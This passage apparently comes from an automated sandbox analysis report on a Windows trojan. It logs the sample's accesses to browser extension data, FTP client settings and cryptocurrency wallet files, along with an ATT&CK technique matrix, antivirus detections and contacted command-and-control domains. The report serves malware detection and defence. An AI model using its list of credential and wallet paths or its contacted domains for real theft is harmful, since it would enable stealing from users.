                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeDirectory queried: number of queries: 1001
                Source: Yara matchFile source: 00000000.00000003.1846125522.0000000001044000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1844004127.000000000100F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1845589560.0000000001044000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1844526538.0000000001044000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1846392780.0000000001044000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1844241993.0000000001010000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1845356512.0000000001044000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1845854080.0000000001044000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1844241993.0000000001044000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1844004127.0000000001044000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1845086320.0000000001044000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: LNn56KMkEE.exe PID: 6948, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: Process Memory Space: LNn56KMkEE.exe PID: 6948, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Windows Management Instrumentation
                1
                DLL Side-Loading
                1
                Process Injection
                34
                Virtualization/Sandbox Evasion
                2
                OS Credential Dumping
                1
                Query Registry
                Remote Services1
                Archive Collected Data
                11
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts2
                Command and Scripting Interpreter
                Boot or Logon Initialization Scripts1
                DLL Side-Loading
                1
                Process Injection
                LSASS Memory751
                Security Software Discovery
                Remote Desktop Protocol41
                Data from Local System
                1
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                PowerShell
                Logon Script (Windows)Logon Script (Windows)1
                Deobfuscate/Decode Files or Information
                Security Account Manager34
                Virtualization/Sandbox Evasion
                SMB/Windows Admin SharesData from Network Shared Drive3
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                Obfuscated Files or Information
                NTDS2
                Process Discovery
                Distributed Component Object ModelInput Capture114
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                Software Packing
                LSA Secrets2
                File and Directory Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading
                Cached Domain Credentials223
                System Information Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                LNn56KMkEE.exe68%VirustotalBrowse
                LNn56KMkEE.exe61%ReversingLabsWin32.Trojan.Generic
                LNn56KMkEE.exe100%AviraTR/Crypt.XPACK.Gen
                LNn56KMkEE.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                NameIPActiveMaliciousAntivirus DetectionReputation
                steamcommunity.com
                104.102.49.254
                truefalse
                  high
                  lev-tolstoi.com
                  104.21.66.86
                  truefalse
                    high
                    sustainskelet.lat
                    unknown
                    unknownfalse
                      high
                      crosshuaht.lat
                      unknown
                      unknownfalse
                        high
                        rapeflowwj.lat
                        unknown
                        unknownfalse
                          high
                          grannyejh.lat
                          unknown
                          unknownfalse
                            high
                            aspecteirs.lat
                            unknown
                            unknownfalse
                              high
                              sweepyribs.lat
                              unknown
                              unknownfalse
                                high
                                discokeyus.lat
                                unknown
                                unknownfalse
                                  high
                                  energyaffai.lat
                                  unknown
                                  unknownfalse
                                    high
                                    necklacebudi.lat
                                    unknown
                                    unknownfalse
                                      high
                                      NameMaliciousAntivirus DetectionReputation
                                      aspecteirs.latfalse
                                        high
                                        sweepyribs.latfalse
                                          high
                                          sustainskelet.latfalse
                                            high
                                            rapeflowwj.latfalse
                                              high
                                              https://steamcommunity.com/profiles/76561199724331900false
                                                high
                                                energyaffai.latfalse
                                                  high
                                                  https://lev-tolstoi.com/apifalse
                                                    high
                                                    grannyejh.latfalse
                                                      high
                                                      necklacebudi.latfalse
                                                        high
                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                        https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngLNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://duckduckgo.com/chrome_newtabLNn56KMkEE.exe, 00000000.00000003.1775552354.00000000058D0000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1775431150.00000000058D3000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1775489902.00000000058D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://player.vimeo.comLNn56KMkEE.exe, 00000000.00000003.1844241993.0000000001044000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://duckduckgo.com/ac/?q=LNn56KMkEE.exe, 00000000.00000003.1775552354.00000000058D0000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1775431150.00000000058D3000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1775489902.00000000058D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&ampLNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://steamcommunity.com/?subsection=broadcastsLNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://lev-tolstoi.com/sLNn56KMkEE.exe, 00000000.00000003.1872487701.0000000001075000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.LNn56KMkEE.exe, 00000000.00000003.1843859744.000000000588C000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1843320427.000000000588C000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1843924713.000000000589B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://store.steampowered.com/subscriber_agreement/LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://www.gstatic.cn/recaptcha/LNn56KMkEE.exe, 00000000.00000003.1752549202.000000000100D000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774736780.000000000100D000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774788879.0000000001044000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=hyEELNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774788879.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001009000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://www.valvesoftware.com/legal.htmLNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&amp;l=enLNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://www.youtube.comLNn56KMkEE.exe, 00000000.00000003.1844241993.0000000001044000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://www.google.comLNn56KMkEE.exe, 00000000.00000003.1844241993.0000000001044000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://bridge.lga1.admarkeLNn56KMkEE.exefalse
                                                                                        unknown
                                                                                        https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYiLNn56KMkEE.exe, 00000000.00000003.1843320427.000000000588C000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1843924713.000000000589B000.00000004.00000800.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1843987961.0000000005891000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackLNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001009000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/LNn56KMkEE.exe, 00000000.00000003.1752549202.000000000100D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&amp;l=englLNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&amp;l=englisLNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774788879.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbCLNn56KMkEE.exe, 00000000.00000003.1846125522.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845589560.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844526538.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752549202.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1846392780.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1872542215.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1774788879.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1752480769.0000000001059000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845356512.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1846827846.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844004127.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1847300280.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845854080.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1845086320.0000000001044000.00000004.00000020.00020000.00000000.sdmp, LNn56KMkEE.exe, 00000000.00000003.1844241993.0000000001044000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
